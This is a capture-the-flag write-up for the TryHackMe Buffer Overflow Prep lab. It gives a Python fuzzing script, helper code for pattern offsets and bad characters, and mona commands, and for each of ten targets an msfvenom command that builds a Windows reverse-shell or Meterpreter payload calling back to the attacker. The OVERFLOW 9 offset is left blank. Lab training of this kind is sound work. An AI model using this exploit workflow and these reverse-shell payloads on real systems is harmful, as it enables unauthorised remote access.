Buffer Overflow Prep

Date: 29 May 2021

Author: Dhilip Sanjay S


Click Here to go to the TryHackMe room.

  • Connect to the machine using RDP:

$ xfreerdp /u:admin /p:password /v:MACHINE_IP /workarea /cert:ignore
  • Spiking is not necessary here, because we already know that every OVERFLOW command is vulnerable.


Scripts

Fuzzing

#! /usr/bin/python3

import socket
import sys
import time

ip = "IP_ADDRESS"
port = 1337
timeout = 5

prefix = b'OVERFLOW1 '
payload = [
    prefix,
    b'A'*100,
]

while True:
    try:
        s = socket.socket()
        s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)                      # read the service banner
        s.send(b''.join(payload))
        print('Fuzzing with {} bytes'.format(len(payload[1])))
        s.recv(1024)                      # a crashed service never replies, so this times out
        s.close()
    except OSError:
        # connection refused, reset or timed out: the service has crashed
        print('Fuzzing crashed at {} bytes'.format(len(payload[1])))
        sys.exit(0)

    payload[1] += b'A'*100                # grow the buffer by 100 bytes each round
    time.sleep(1)

Finding Offset & overwriting EIP

  • Generate pattern using pattern_create:

  • Find offset using pattern_offset:
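As an added example (not code from this write-up or the TryHackMe room), the following Python re-implements what pattern_create and pattern_offset do, so the EIP values recorded in the OVERFLOW sections below can be turned into offsets offline. It assumes the Metasploit pattern layout (triplets of upper-case letter, lower-case letter, digit) and a 4-byte little-endian EIP, which is what the x86 target here has.

```python
import string


def cyclic_pattern(length):
    """Build the same non-repeating pattern as Metasploit's pattern_create.rb:
    triplets of upper-case letter, lower-case letter, digit ("Aa0Aa1Aa2...").
    Every 4-byte window is unique for the first 20280 bytes (26*26*10*3)."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern would repeat beyond 20280 bytes")
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def eip_to_bytes(eip_hex):
    """The debugger shows EIP as a 32-bit number; in memory (x86, little-endian)
    its lowest byte comes first, so an EIP of 6F43396E means the return
    address slot was overwritten with the bytes b"n9Co"."""
    return int(eip_hex, 16).to_bytes(4, "little")


def pattern_offset(eip_hex, length):
    """Equivalent of pattern_offset.rb -q <EIP> -l <length>: the index of the
    4 pattern bytes that landed in EIP, i.e. how much padding precedes the
    return address. Returns None when EIP holds something other than
    pattern bytes (e.g. the crash happened before EIP was overwritten)."""
    idx = cyclic_pattern(length).find(eip_to_bytes(eip_hex))
    return None if idx == -1 else idx


if __name__ == "__main__":
    # Values recorded for OVERFLOW1 below: pattern length 2500, EIP 6F43396E
    print(eip_to_bytes("6F43396E"))           # b'n9Co'
    print(pattern_offset("6F43396E", 2500))   # 1978
```

The same function reproduces the other recorded results (76413176 at length 1200 gives 634, 41397241 at length 1000 gives 537); a value such as 41414141 is not found because the pattern never contains two consecutive upper-case letters, which is the whole reason the pattern is used instead of plain A's.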

Finding Bad chars

Finding Right Module

Shell code & Shell Access


OVERFLOW 1

Fuzzing

  • Crash occurred at 2000 bytes

Finding Offset & overwriting EIP

  • Generate Pattern of length 2500

  • EIP VALUE = 6F43396E

  • Exact match at offset 1978

Finding Bad chars

  • Find the bad chars using mona: \x00\x07\x2e\xa0

Bad Chars - Overflow 1

Finding Right Module

  • Find the right module using: !mona modules

  • Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x07\x2e\xa0"

  • JMP ESP address: 0x625011F7

Shell code & Shell Access

  • Generate shell code using: msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x07\x2e\xa0"

  • Don't forget to add nop sled.

  • Run the exploit & nc:


OVERFLOW 2

Fuzzing

Finding Offset & overwriting EIP

  • Generate Pattern of length 1200

  • EIP VALUE = 76413176

  • Exact match at offset 634

Finding Bad chars

  • Find the bad chars manually: \x00\x23\x3c\x83\xba

Bad Chars - Overflow 2

Finding Right Module

  • Find the right module using: !mona modules

  • Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x23\x3c\x83\xba"

  • JMP ESP address: 0x625011BB

Shell code & Shell Access

  • Generate shell code using: msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x23\x3c\x83\xba"

  • Don't forget to add nop sled.

  • Run the exploit & nc:


OVERFLOW 3

Fuzzing

Finding Offset & overwriting EIP

  • Generate Pattern of length 1800

  • EIP VALUE = 35714234

  • Exact match at offset 1274

  • Found using: !mona findmsp -distance <pattern length>

Finding Bad chars

  • Find the bad chars using mona: \x00\x11\x40\x5f\xb8\xee

Bad Chars - Overflow 3

Finding Right Module

  • Find the right module using: !mona modules

  • Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x11\x40\x5f\xb8\xee"

  • JMP ESP address: 62501203 (Only two addresses were available!)

Shell code & Shell Access

  • Generate shell code using: msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -b "\x00\x11\x40\x5f\xb8\xee" -f py

  • Note: the Meterpreter payload is larger than the plain shell_reverse_tcp payload.

  • Don't forget to add nop sled.

  • Run the exploit & multi/handler in msfconsole:


OVERFLOW 4

Fuzzing

Finding Offset & overwriting EIP

  • Generate Pattern of length 2600

  • EIP VALUE = 005c394a

  • Exact match at offset 2026

Finding Bad chars

  • Find the bad chars using mona: \x00\xa9\xcd\xd4

Bad Chars - Overflow 4

Finding Right Module

  • Find the right module using: !mona modules

  • Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\xa9\xcd\xd4"

  • JMP ESP address: 625011eb

Shell code & Shell Access

  • Generate shell code using: msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -b "\x00\xa9\xcd\xd4" -f py

  • Don't forget to add nop sled.

  • Run the exploit & msfconsole multi/handler:


OVERFLOW 5

Fuzzing

Finding Offset & overwriting EIP

  • Generate Pattern of length 1000

  • EIP VALUE = 356b4134

  • Exact match at offset 314

Finding Bad chars

  • Find the bad chars manually: \x00\x16\x2f\xf4\xfd

Bad Chars - Overflow 5

Finding Right Module

  • Find the right module using: !mona modules

  • Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x16\x2f\xf4\xfd"

  • JMP ESP address: 625011d3

Shell code & Shell Access

  • Generate shell code using: msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x16\x2f\xf4\xfd"

  • Don't forget to add nop sled.

  • Run the exploit & nc:


OVERFLOW 6

Fuzzing

Finding Offset & overwriting EIP

  • Generate Pattern of length 1600

  • EIP VALUE = 35694234

  • Exact match at offset 1034

Finding Bad chars

  • Find the bad chars using mona: \x00\x08\x2c\xad

Bad Chars - Overflow 6

Finding Right Module

  • Find the right module using: !mona modules

  • Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x08\x2c\xad"

  • JMP ESP address: 625011f7

Shell code & Shell Access

  • Generate shell code using: msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x08\x2c\xad"

  • Don't forget to add nop sled.

  • Run the exploit & nc:


OVERFLOW 7

Fuzzing

Finding Offset & overwriting EIP

  • Generate Pattern of length 2000

  • EIP VALUE = 72423572

  • Exact match at offset 1306

Finding Bad chars

  • Find the bad chars manually: \x00\x8c\xae\xbe\xfc

Bad Chars - Overflow 7

Finding Right Module

  • Find the right module using: !mona modules

  • Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x8c\xae\xbe\xfc"

  • JMP ESP address: 62501203

Shell code & Shell Access

  • Generate shell code using: msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -f py -b "\x00\x8c\xae\xbe\xfc"

  • Don't forget to add nop sled.

  • Run the exploit & multi/handler:


OVERFLOW 8

Fuzzing

Finding Offset & overwriting EIP

  • Generate Pattern of length 2300

  • EIP VALUE = 68433568

  • Exact match at offset 1786

Finding Bad chars

  • Find the bad chars using mona: \x00\x1d\x2e\xc7\xee

Bad Chars - Overflow 8

Finding Right Module

  • Find the right module using: !mona modules

  • Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x1d\x2e\xc7\xee"

  • JMP ESP address: 62501205

Shell code & Shell Access

  • Generate shell code using: msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -f py -b "\x00\x1d\x2e\xc7\xee"

  • Don't forget to add nop sled.

  • Run the exploit & multi/handler:


OVERFLOW 9

Fuzzing

Finding Offset & overwriting EIP

  • Generate Pattern of length 2000

  • EIP VALUE = 35794234

  • Exact match at offset

Finding Bad chars

  • Find the bad chars using mona: \x00\x04\x3e\x3f\xe1

  • Note: \x3f is not a bad char (but the answer in TryHackMe required 5 chars)

Bad Chars - Overflow 9
  • On rerunning the script, I found that \x3f is bad, so it also affected \x40. (This can be checked by setting \x3e to some non-bad character.)

  • So, if two bad characters are adjacent, they cannot be determined in a single test. We have to run the exploit multiple times to detect that!
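The point in the two notes above (an adjacent bad char only becomes visible once its neighbour has been excluded) can be demonstrated offline. The following Python is an added example, not code from this write-up or the room: the comparison logic mirrors what a bytearray compare in the debugger reports, and the target is a constructed stand-in whose mangling rules are made up for the demonstration.

```python
def bytearray_without(excluded):
    """Every byte value 0x01..0xff that is not already known to be bad.
    0x00 is always left out: the string handling behind services like this
    treats it as a terminator, so it can never be tested this way."""
    return bytes(b for b in range(1, 256) if b not in excluded)


def first_corruption(sent, dump):
    """Compare the bytes we sent with the bytes the debugger shows on the
    stack and return the value in the first slot that differs (None if
    identical). Only that first slot is meaningful: a dropped byte shifts
    every later byte one slot earlier and a substituted byte can change how
    the rest is parsed, so later differences are side effects, not evidence.
    (A byte the target expands into several would need a manual look at the
    dump, because the first differing slot then belongs to the byte after it.)"""
    for i, sent_byte in enumerate(sent):
        if i >= len(dump) or dump[i] != sent_byte:
            return sent_byte
    return None


def find_bad_chars(send_and_dump, max_rounds=16):
    """Iterate the way the OVERFLOW9 notes above recommend: blame the first
    corrupted slot, exclude that byte, re-send, and repeat until the dump
    matches. Returns (sorted bad chars, number of rounds run)."""
    bad = {0x00}
    for attempt in range(1, max_rounds + 1):
        sent = bytearray_without(bad)
        candidate = first_corruption(sent, send_and_dump(sent))
        if candidate is None:
            return sorted(bad), attempt
        bad.add(candidate)
    raise RuntimeError("dump still differs after %d rounds" % max_rounds)


def escape_list(bad):
    """Render the set in the \\x.. form that mona's -cpb and msfvenom's -b expect."""
    return "".join("\\x%02x" % b for b in bad)


# Constructed stand-in for the target (not the real OVERFLOW9 service): it
# drops 0x04, 0x3e and 0x3f and turns 0xe1 into a NUL. The adjacent pair
# 0x3e/0x3f is the case the notes describe: while 0x3e is dropped, 0x3f lands
# in 0x3e's slot, so the first comparison can only convict 0x3e; 0x3f is only
# caught in the round after 0x3e has been excluded.
CONSTRUCTED_RULES = {0x04: b"", 0x3e: b"", 0x3f: b"", 0xe1: b"\x00"}


def constructed_target(payload):
    """Return what the constructed target would leave on the stack."""
    out = bytearray()
    for b in payload:
        out += CONSTRUCTED_RULES.get(b, bytes([b]))
    return bytes(out)


if __name__ == "__main__":
    bad, rounds = find_bad_chars(constructed_target)
    print(escape_list(bad), "found in", rounds, "rounds")  # \x00\x04\x3e\x3f\xe1 found in 5 rounds
```

Four of the five rounds each convict exactly one byte and the last round is the clean confirmation; against a real service the send_and_dump callback is the step where the payload is sent and the stack is read back in the debugger, which is why the process cannot be collapsed into a single run.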

Finding Right Module

  • Find the right module using: !mona modules

  • Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x04\x3e\x3f\xe1"

  • JMP ESP address: 625011c7

Shell code & Shell Access

  • Generate shell code using: msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x04\x3e\x3f\xe1"

  • Don't forget to add nop sled.

  • Run the exploit & nc:


OVERFLOW 10

Fuzzing

Finding Offset & overwriting EIP

  • Generate Pattern of length 1000

  • EIP VALUE = 41397241

  • Exact match at offset 537

Finding Bad chars

  • Find the bad chars using mona: \x00\xa0\xad\xbe\xde\xef

Bad Chars - Overflow 10

Finding Right Module

  • Find the right module using: !mona modules

  • Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\xa0\xad\xbe\xde\xef"

  • JMP ESP address: 625011af

Shell code & Shell Access

  • Generate shell code using: msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\xa0\xad\xbe\xde\xef"

  • Don't forget to add nop sled.

  • Run the exploit & nc:

